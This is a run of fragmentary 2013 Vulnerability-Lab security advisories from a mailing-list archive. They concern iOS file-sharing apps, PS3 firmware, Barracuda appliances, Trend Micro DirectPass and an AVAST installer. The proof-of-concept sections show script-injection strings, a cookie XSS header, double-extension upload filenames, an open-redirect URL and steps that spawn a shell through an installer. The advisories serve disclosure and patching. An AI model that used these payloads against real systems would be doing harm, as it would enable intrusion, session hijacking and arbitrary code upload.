'id':1},{'name':'Recents', 'id':2},{'name':'benjamin.html', 'id':3}]


Reference(s):
http://localhost:8080/files




1.2
The persistent script code injection web vulnerability can be exploited by 
remote attackers without application user account and
with low user interaction. For demonstration or reproduce ...


PoC: File Name - Index Output Listing

a href=http://192.168.2.104:8080/files/%3E%22%3Ciframe%20src=a%3E; 
class=file
[PERSISTENT SCRIPT CODE INJECT VULNERABILITY!] 
src=Welcome%20to%20Evereader%20Wi-Fi%20Sharing%21_files/hack.txt/a
/tdtd
 class='del'form action='/files/%3E%22%3C[PERSISTENT SCRIPT CODE INJECT 
VULNERABILITY!]%3E' 
method='post'input name='_method' value='delete' 
type='hidden'/input name=commit type=submit value=Delete 
class='button' //td/tr/tbody/table/iframe/a



1.3
The client side script code injection web vulnerability can be exploited by 
remote attackers without application user account and 
with low or medium required user interaction. For demonstration or reproduce ...

PoC: GET REQUEST METHOD - File Request

--- Request Header ---
Host=192.168.2.104:8080
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 
Firefox/20.0
Accept=application/json, 
text/javascript, */*
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
DNT=1
X-Requested-With=XMLHttpRequest

Referer=http://192.168.2.104:8080/
Cookie=USERID=SCRIPTdocument.cookie=true/SCRIPT; true
Connection=keep-alive


--- Response Header ---
Status=OK - 200
Accept-Ranges=bytes
Content-Length=171
Cache-Control=private, max-age=0, must-revalidate
Content-Type=text/plain; 
charset=utf-8
Date=Fr., 26 Apr 2013 17:48:48 GMT


URL: http://localhost:8080/files?Fri%20Apr%2026%202013%2019:46:51%20GMT+0200


Solution:
=
1.1
Parse the POST method request when processing to upload a file with wrong 
extension and disallow double extensions. 
Restrict the file access of web files like html, php or java-script.
Implement a own exception-handling to prevent again future arbitrary file 
uploads.

1.2
Restrict the input/output  of the del filename and file input parameter. Encode 
and parse the output of the both vulnerable values to patch the issue.

1.3
Parse the parameter request with the flag details to fix the vulnerability in 
the GET request.


Risk:
=
1.1
The security risk of the remote arbitrary file upload vulnerability is 
estimated as high(-)

1.2
The security risk of the persistent input validation web vulnerability is 
estimated as medium(+).

1.3
The security risk of the client side cross site scripting vulnerability is 
estimated as low(+).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com) [www.vulnerability-lab.com]


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor

Sony PS3 Firmware v4.31 - Code Execution Vulnerability

2013-05-21 Thread Vulnerability Lab

.

The ps3 filter system of the SpeicherDaten (DienstProgramm) module does not 
recognize special chars and does not provide 
any kind of input restrictions. Attackers can manipulate the .sfo file of a 
save game to execute system specific commands 
or inject malicious persistent script code out of the save game preview listing.

If you inject standard frames or system unknow commands (jailbreak) without 
passing the filter char by char and direct sync 
as update you will fail to reproduce! 

PoC: PARAM.SFO

PSF  Ä   @                               h  
   %          ,          4       
$  C    @   (  V       h  j 
   €   p  t    €   ð  
ACCOUNT_ID ATTRIBUTE CATEGORY DETAIL PARAMS PARAMS2 PARENTAL_LEVEL 
SAVEDATA_DIRECTORY SAVEDATA_LIST_PARAM SUB_TITLE TITLE
40ac78551a88fdc
SD  
PSHACK: Benjamin Ninja H%20'[PERSISTENT INJECTED SYSTEM COMMAND OR CODE!]

Hackizeit: 1:33:07

ExpSkills: VL-LAB-TRAINING

Operation: 1%
Trojaners: 0%
... Õõ~\˜òíA×éú;óç40ac78551a88fdc
...
BLES00371-NARUTO_STORM-0
HACKINGBKM 1
PSHACK: Benjamin Ninja H%20'[PERSISTENT INJECTED SYSTEM COMMAND OR CODE!];



Solution:
=
Restrict the savegame name input and disallow special chars.
Encode the savegame values and redisplaying in the menu preview of the game.
Parse the strings and values from the savegames even if included string by 
string via sync.


Risk:
=
The security risk of the high exploitable but local vulnerability is estimated 
as critical and needs to be fixed soon.


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri  
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability 
Laboratory

-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

Trend Micro DirectPass 1.5.0.1060 - Multiple Vulnerabilities

2013-05-22 Thread Vulnerability Lab

 it was the 9th may.
On the 18th we downloaded again the main software direct-pass and tested the 
core without an update and it was still vulnerable.
To fix the issue in the software an update from the update-server  is required 
after the install.


Risk:
=
1.1
The security risk of the local command/path injection software vulnerability in 
the directpass software core is estimated as high(-).

1.2
The security risk of the persistent scirpt code inject vulnerability is 
estimated as medium(+).

1.3
The security risk of the pointer (DoS) software vulnerability is estimated as 
medium(-).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability 
Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

Barracuda SSL VPN 680 2.2.2.203 - Redirect Web Vulnerability

2013-05-27 Thread Vulnerability Lab

Title:
==
Barracuda SSL VPN 680 2.2.2.203 - Redirect Web Vulnerability


Date:
=
2013-05-25


References:
===
http://www.vulnerability-lab.com/get_content.php?id=755

Barracuda Networks Security ID (BNSEC): 731


VL-ID:
=
755


Common Vulnerability Scoring System:

1.3


Introduction:
=
The Barracuda SSL VPN is an integrated hardware and software solution enabling 
secure, clientless remote 
access to internal network resources from any Web browser. Designed for remote 
employees and road warriors, 
the Barracuda SSL VPN provides comprehensive control over file systems and 
Web-based applications requiring 
external access. The Barracuda SSL VPN integrates with third-party 
authentication mechanisms to control user 
access levels and provides single sign-on. 

Barracuda SSL VPN   

* Enables access to corporate intranets, file systems or other Web-based 
applications
* Tracks resource access through auditing and reporting facilities
* Scans uploaded files for viruses and malware
* Leverages multi-factor, layered authentication mechanisms, including RSA 
SecurID and VASCO tokens
* Integrates with existing Active Directory and LDAP directories
* Utilizes policies for granular access control framework
* Supports any Web browser on PC or Mac

(Copy of the Vendor Homepage: 
http://www.barracudanetworks.com/ns/products/sslvpn.php)


Abstract:
=
The Vulnerability Laboratory Research Team discovered a redirect vulnerability 
in the official Barracuda Networks SSL VPN 680 v2.2.2.203.


Report-Timeline:

2012-11-11: Researcher Notification  Coordination
2012-11-12: Vendor Notification
2012-11-19: Vendor Response/Feedback
2013-02-20: Vendor Fix/Patch
2012-05-27: PublicDisclosure


Status:

Published


Affected Products:
==
Barracuda Networks
Product: SSL VPN 680 2.2.2.203


Exploitation-Technique:
===
Remote


Severity:
=
Low


Details:

A remote redirection (external) vulnerability is detected in the Barracuda SSL 
VPN 680 v2.2.2.203 (Vx) Web Application Appliance.
The bug allows remote attackers to prepare links to client side external 
redirects with malware, phishing websites or malicious 
web context. 

The vulnerability is located in the resourceId parameter request when 
processing to load via GET method an internal `returnTo` file redirect.

Vulnerable Module(s):
[+] launchApplication.do [resourceId]

Vulnerable Parameter(s):
[+] returnTo


Proof of Concept:
=
The vulnerability can be exploited by remote attacker without privileged 
application user account but with medium or
high required user inter action. For demonstration or reproduce ...

1.1
The first url shows the standard request via GET request
https://sslvpn.127.0.0.1:8080/launchApplication.do?resourceId=1policy=1returnTo=%2FshowApplicationShortcuts.do

1.2
The secound url shows the manipulated remote context via GET request
https://sslvpn.127.0.0.1:8080/launchApplication.do?resourceId=1policy=1returnTo=http://www.vulnerability-lab.com

https://sslvpn.[SERVER]/[FILE].do?[RES+ID]=x[POLICY]=xreturnTo=[EXTERNAL 
TARGET]


Solution:
=
The vulnerability can be patched by allowing only local file requests when 
processing to load the vulnerable returnTo parameter via GET.

2013-02-20: Vendor Fix/Patch


Risk:
=
The security risk of the redirection vulnerability is estimated as low(+).


Credits:

Vulnerability Laboratory [Research Team]  -Chokri Ben Achour 
(meis...@vulnerability-lab.com)
Barracuda Networks [Security Team] - Dave Farrow (Communication  Coordination)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com

Bluetooth Chat Connect v1.0 iOS - Multiple Vulnerabilities

2013-06-11 Thread Vulnerability Lab

 user name with a 
secure filter mask.
Escape, filter or encode the message listing to prevent the execution of 
persistent script codes.

1.2
The denial of service issue can be patched by a secure parse of the collision 
when processing to handle the same string 2 times as message.


Risk:
=
1.1
The security risk of the persistent input validation web vulnerability in the 
client is estimated as medium(+).

1.2
The security risk of the remote denial of service vulnerability in the client 
is estimated as medium(-).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com) [www.vulnerability-lab.com]


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability 
Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

eFile Wifi Transfer Manager 1.0 iOS - Multiple Vulnerabilities

; WOW64; rv:21.0) Gecko/20100101 
Firefox/21.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
DNT=1
X-Requested-With=XMLHttpRequest
X-File-Name=1234.png.txt.iso.php.gif
Content-Type=application/octet-stream
Referer=http://localhost:8080/
Content-Length=98139
POSTDATA =?PNG[X]


+ double extensions

http://localhost:8080/[PATH NAME (x) VALUE].png.txt.iso.php


// return false to cancel submit
onSubmit: function(id, fileName){},
onProgress: function(id, fileName, loaded, total){},
onComplete: function(id, fileName, responseJSON){},
onCancel: function(id, fileName){},
// messages

messages: {
typeError: {file} has invalid extension. Only {extensions} are allowed.,
sizeError: {file} is too large, maximum file size is {sizeLimit}.,
minSizeError: {file} is too small, minimum file size is {minSizeLimit}.,
emptyError: {file} is empty, please select files again without it.,
onLeave: The files are being uploaded, if you leave now the upload will be 
cancelled.},
...   ...
// added to list item when upload completes
// used in css to hide progress spinner
success: 'qq-upload-success',
...


1.2
The persistent input validation web vulnerability can be exploited by remote 
attackers without privileged application user account 
and with low required user interaction. For demonstration or reproduce ...

New Folder ...

POST http://localhost:8080/# Load Flags[LOAD_DOCUMENT_URI  
LOAD_INITIAL_DOCUMENT_URI  ] 
Content Size[-1] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 
Firefox/21.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://localhost:8080/]
Connection[keep-alive]
Post Data:
newFolder[%2520%3E%22%3C[PERSISTENT INJECTED SCRIPT CODE!]+src%3Da%3E]
submitButton[Create]

Response Headers:
Transfer-Encoding[chunked]
Accept-Ranges[bytes]
Date[Sun, 23 Jun 2013 10:16:41 GMT]


http://localhost:8080/[PATH NAME (x) VALUE]

function newFolder()
{
var title = document.getElementById(formTitle);
title.innerText = eFile;
title.textContent = eFile;
title.setAttribute(id,formTitle);

... ...
var message = document.getElementById(formMessage);
message.innerText = Enter new folder name;
message.textContent = Enter new folder name;
message.setAttribute(id,formMessage);
...


Reference(s):
../pagescript.js


Solution:
=
1.1
The arbitrary file upload vulnerability can be patched by a secure parse and 
restriction in the file upload module and the bound listing access.

1.2
The persistent input validation web vulnerability can be patched by a secure 
parse of the foldername. 
Parse the input fields of new folder and also the index output listing to 
prevent persistent injections or script code executions.


Risk:
=
1.1
The security risk of the multiple arbitrary file upload vulnerability and 
restriction bypass is estimated as critical.

1.2
The security risk of the persistent input validation web vulnerability is 
estimated as high.


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@evolution-sec.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission

Mobile USB Drive HD 1.2 - Arbitrary File Upload Vulnerability

/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 
Firefox/21.0]
  
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Accept-Language[en-US,en;q=0.5]
  
Accept-Encoding[gzip, deflate]
  DNT[1]
  
Referer[http://192.168.2.104:8080/]


21:01:43.184[125ms][total 177ms] 
Status: 200[OK]

GET http://192.168.2.104:8080/files/1234.png.txt.iso.php.gif 
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] 
Content Size[98139] Mime Type[application/x-unknown-content-type]
   
Request Headers:
  Host[192.168.2.104:8080]
  User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 
Firefox/21.0]
  
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Accept-Language[en-US,en;q=0.5]
  Accept-Encoding[gzip, deflate]
  
DNT[1]
  Referer[http://192.168.2.104:8080/]
  Connection[keep-alive]
  Cache-Control[max-age=0]
   

Response Headers:
  Accept-Ranges[bytes]
  Content-Length[98139]
  Date[Do., 27 Jun 2013 19:06:58 GMT]


21:01:43.389[2393ms][total 2393ms] 
Status: 200[OK]
GET http://192.168.2.104:8080/files/1234.png.txt.iso.php.gif 
Load Flags[LOAD_NORMAL] Content Size[98139] Mime 
Type[application/x-unknown-content-type]
   

Request Headers:
  Host[192.168.2.104:8080]
  
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 
Firefox/21.0]
  
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Accept-Language[en-US,en;q=0.5]
  
Accept-Encoding[gzip, deflate]
  DNT[1]
  Connection[keep-alive]
   Response Headers:
  Accept-Ranges[bytes]
  
Content-Length[98139]
  Date[Do., 27 Jun 2013 19:07:00 GMT]


Risk:
=
1.1
The security risk of the arbitrary file upload vulnerability and the multiple 
extensions issue are estimated as high.


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@evolution-sec.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability 
Laboratory

-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: resea...@vulnerability-lab.com

Barracuda CudaTel 2.6.02.04 - Multiple Web Vulnerabilities



Solution:
=
2013-03-14: Vendor Fix/Patch (Barracuda Networks Developer) [Coordination: 
Dave Farrow]

Note: The upgrade is available to all customer of the appliance module and can 
be done automatic or manually in the customer center of barracuda networks.


Risk:
=
The security risk of the (multiple) client side input validation 
vulnerabilities in the siplist and list module are estimated as medium.


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability 
Laboratory



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: resea...@vulnerability-lab.com

Barracuda CudaTel 2.6.02.04 - Persistent Web Vulnerability

Title:
==
Barracuda CudaTel 2.6.02.04 - Persistent Web Vulnerability


Date:
=
2013-06-21


References:
===
http://vulnerability-lab.com/get_content.php?id=777

BARRACUDA NETWORK SECURITY ID: BNSEC-834


VL-ID:
=
777


Common Vulnerability Scoring System:

3.5


Introduction:
=
Designed to enable seamless voice and video communication, the CudaTel 
Communication Server is an easy-to-use, 
affordable, next-generation phone system for businesses. CudaTel Communication 
Server s enterprise-class 
feature set includes Voice over IP (VoIP) PBX services, conferencing, 
follow-me, automated attendant services, 
and more, controlled by an easy-to-use Web interface. CudaTel Communication 
Server is compatible with any SIP 
device and provider, and can be pre-configured for use with both analog and 
digital telephone networks. Powerful, 
Complete Solution With an expansive feature set and and no per user or phone 
licensing fees, the CudaTel 
Communication Server is equipped and priced for organizations of any size. 
Native High Definition audio support 
and integrated phone line (TDM) hardware produces an unparalleled audio 
experience. VOIP encryption protects calls 
from hackers and digital eavesdroppers.

(Copy of the Vendor Homepage: http://www.barracudanetworks.ca/cudatel.aspx )


Abstract:
=
The Vulnerability Laboratory Research Team discovered a client side web 
vulnerability in Barracuda Networks CudaTel v2.6.002.040 appliance application.


Report-Timeline:

2012-11-26: Researcher Notification  Coordination (Chokri Ben Achour)
2012-11-27: Vendor Notification (Barracuda Networks Security Team - Bug 
Bounty Program)
2013-04-03: Vendor Response/Feedback (Barracuda Networks Security Team - 
Bug Bounty Program)
2013-05-02: Vendor Fix/Patch (Barracuda Networks Developer Team) 
[Coordination: Dave Farrow]
2012-06-00: Public Disclosure (Vulnerability Laboratory)


Status:

Published


Affected Products:
==
Barracuda Networks
Product: CudaTel - Communication Server 2.6.002.040


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

The vulnerability laboratory research team discovered a persistent web 
vulnerability  in Barracuda Networks CudaTel v2.6.002.040 appliance application.
The input validation vulnerability allows remote attackers to inject own 
malicious persistent script code on application side of the vulnerable module.

The vulnerability is located in the `find me` module of the `call forwarding` 
function when processing to request manipulated parameters via `add listing`.
Local low privilege application user accounts can inject persistent script code 
to exploit higher privilege web application accounts. 

The remote bug can be exploited by remote attacker with low privileged 
application user account and low required userinteraction. Successful 
exploitation 
of the vulnerabilities result in persistent session hijacking, persistent 
persistent external redirects to malware or malicious sites, persistent 
phishing 
and persistent web context manipulation (vulnerable module).

Vulnerable Section(s):
[+] Find Me

Vulnerable Module(s):
[+] Call Forwarding - Add

Vulnerable Parameter(s):
[+] Calling Sequence - Listing


Proof of Concept:
=





Solution:
=
The vulnerability can be patched  by parsing the listed (output) web context 
after processing to add.
restrict also the input fields and disallow special chars or wrong strings.

2013-05-02: Vendor Fix/Patch (Barracuda Networks Developer Team) 
[Coordination: Dave Farrow]


Risk:
=
The security risk of the persistent input validation vulnerability is estimated 
as medium.


Credits:

Vulnerability Laboratory [Research Team] - Chokri Ben Achour 
(meis...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com

AVAST Universal Core Installer - Multiple Vulnerabilities

2013-07-04 Thread Vulnerability Lab

) Click Next twice untill you reach the Installation Information Window
e) Scroll down and you should be able to see our Injected Payload. 
f) If you click on ClickME you should get a CMD shell spawned on the local 
system hence proving the existence of this vulnerability.
g  If you proceed with the installation and continue, the installation will 
fail eventually and once again in the Final Install Log you 
will see the executed payload. 

Note: All tests were performed on a system running latest version of MicroSoft 
Windows 7 OS.


Solution:
=
By default, no user should be allowed to inject HTML code in the application. 
This can be mitigated by performing proper input sanatization of the vulnerable 
fields. 

All illegal characters should also be escaped and application source code 
should be hardened overall. 
Proper input encoding and format parse in the source code will fix this issue.


Risk:
=
The security risk of these kinds of vulnerabilities are estimated as medium(+).


Credits:

Vulnerability Laboratory [Research Team] - Ateeq Khan [at...@evolution-sec.com]


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

